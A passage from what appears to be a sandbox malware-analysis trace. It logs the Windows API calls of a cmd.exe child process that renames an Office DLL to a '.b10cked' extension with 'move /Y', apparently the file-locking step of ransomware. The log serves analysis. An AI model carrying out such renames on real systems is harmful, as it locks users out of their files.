GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.755] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.755] GetEnvironmentStringsW () returned 0x240210* [0173.755] FreeEnvironmentStringsW (penv=0x240210) returned 1 [0173.755] GetEnvironmentStringsW () returned 0x240210* [0173.755] FreeEnvironmentStringsW (penv=0x240210) returned 1 [0173.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e84c | out: phkResult=0x16e84c*=0x40) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0xa0, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x0, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x4) returned 0x0 [0173.755] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.755] RegCloseKey (hKey=0x40) returned 0x0 [0173.755] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e84c | out: phkResult=0x16e84c*=0x40) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x40, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x1, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x0, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x4, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x4) returned 0x0 [0173.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e854, lpData=0x16e858, lpcbData=0x16e850*=0x1000 | out: lpType=0x16e854*=0x0, lpData=0x16e858*=0x9, lpcbData=0x16e850*=0x1000) returned 0x2 [0173.756] RegCloseKey (hKey=0x40) returned 0x0 [0173.756] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.756] srand (_Seed=0x5b886389) [0173.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" [0173.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" [0173.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.756] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.756] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.757] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.757] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.757] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.757] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.757] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.757] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.757] GetEnvironmentStringsW () returned 0x242360* [0173.757] FreeEnvironmentStringsW (penv=0x242360) returned 1 [0173.757] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.757] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.757] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.757] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.757] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.757] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.757] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f618 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f618, lpFilePart=0x16f614 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f614*="Desktop") returned 0x18 [0173.757] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.757] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f394 | out: lpFindFileData=0x16f394) returned 0x2409f0 [0173.758] FindClose (in: hFindFile=0x2409f0 | out: hFindFile=0x2409f0) returned 1 [0173.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.758] GetEnvironmentStringsW () returned 0x240210* [0173.758] FreeEnvironmentStringsW (penv=0x240210) returned 1 [0173.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.759] GetConsoleOutputCP () returned 0x1b5 [0173.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.759] GetUserDefaultLCID () returned 0x409 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f758, cchData=128 | out: lpLCData="0") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f758, cchData=128 | out: lpLCData="0") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f758, cchData=128 | out: lpLCData="1") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.760] GetConsoleTitleW (in: lpConsoleTitle=0x230930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.761] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.761] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.761] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.761] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.765] GetConsoleTitleW (in: lpConsoleTitle=0x16f450, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.765] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.765] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.765] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.765] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.765] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.765] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.765] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.765] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.766] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.766] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.766] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.766] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.766] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.766] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f20c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f204, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f204*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.770] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.770] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0173.770] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0173.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visint~1.trx")) returned 0x2020 [0173.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.770] SetErrorMode (uMode=0x0) returned 0x0 [0173.770] SetErrorMode (uMode=0x1) returned 0x0 [0173.770] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16eb94, lpFilePart=0x16eb7c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", lpFilePart=0x16eb7c*="VISINT~1.TRX") returned 0x3c [0173.770] SetErrorMode (uMode=0x0) returned 0x1 [0173.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.771] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0173.771] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0173.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visint~1.trx")) returned 0x2020 [0173.771] SetErrorMode (uMode=0x0) returned 0x0 [0173.771] SetErrorMode (uMode=0x1) returned 0x0 [0173.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16f010, lpFilePart=0x16eda8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", lpFilePart=0x16eda8*="VISINT~1.TRX") returned 0x3c [0173.771] SetErrorMode (uMode=0x0) returned 0x1 [0173.771] SetErrorMode (uMode=0x0) returned 0x0 [0173.771] SetErrorMode (uMode=0x1) returned 0x0 [0173.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f218, lpFilePart=0x16eda8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x16eda8*="VISINTL.DLL.trx_dll.b10cked") returned 0x4b [0173.771] SetErrorMode (uMode=0x0) returned 0x1 [0173.771] SetLastError (dwErrCode=0x0) [0173.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.771] GetLastError () returned 0x2 [0173.771] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e724, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e724) returned 0x242130 [0173.772] FindNextFileW (in: hFindFile=0x242130, lpFindFileData=0x16e724 | out: lpFindFileData=0x16e724) returned 0 [0173.772] GetLastError () returned 0x12 [0173.772] FindClose (in: hFindFile=0x242130 | out: hFindFile=0x242130) returned 1 [0173.774] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x241cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241cc0) returned 0x242130 [0173.774] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16e9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0173.774] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16e9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0173.774] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll")) returned 0x2020 [0173.774] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.775] FindClose (in: hFindFile=0x242130 | out: hFindFile=0x242130) returned 1 [0173.775] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e970 | out: _Buffer=" 1") returned 9 [0173.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.775] GetFileType (hFile=0x7) returned 0x2 [0173.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e8fc | out: lpMode=0x16e8fc) returned 1 [0173.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e930 | out: lpConsoleScreenBufferInfo=0x16e930) returned 1 [0173.906] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.906] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e970 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.906] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e954, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e954*=0x1a) returned 1 [0173.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.906] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.907] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.907] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.907] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.907] SetConsoleInputExeNameW () returned 0x1 [0173.907] GetConsoleOutputCP () returned 0x1b5 [0173.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.907] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.907] exit (_Code=0) Process: id = "306" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = 